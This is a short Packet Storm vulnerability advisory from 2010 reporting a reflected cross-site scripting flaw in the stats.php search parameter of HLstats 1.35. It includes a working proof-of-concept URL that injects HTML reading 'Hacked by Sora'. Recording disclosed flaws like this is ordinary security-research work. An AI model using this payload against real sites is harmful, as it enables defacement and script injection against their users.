HLstats 1.35 Cross Site Scripting

2010-01-04T00:00:00
ID PACKETSTORM:84670
Type packetstorm
Reporter Sora
Modified 2010-01-04T00:00:00

Description

                                        
                                            `-------------------------------------------  
> HLstats 1.35 XSS Exploit  
> Contact: vhr95zw [at] hotmail [dot] com  
> Website: http://greyhathackers.wordpress.com/  
  
# Description:  
HLstats 1.35 is vulnerable to XSS in stats.php.  
  
# PoC:  
http://server/stats.php?mode=search&q=%3Ch2%3EHacked+by+Sora+-+grey.hat.hackers%3C%2Fh2%3E&st=player&game=cstrike  
  
`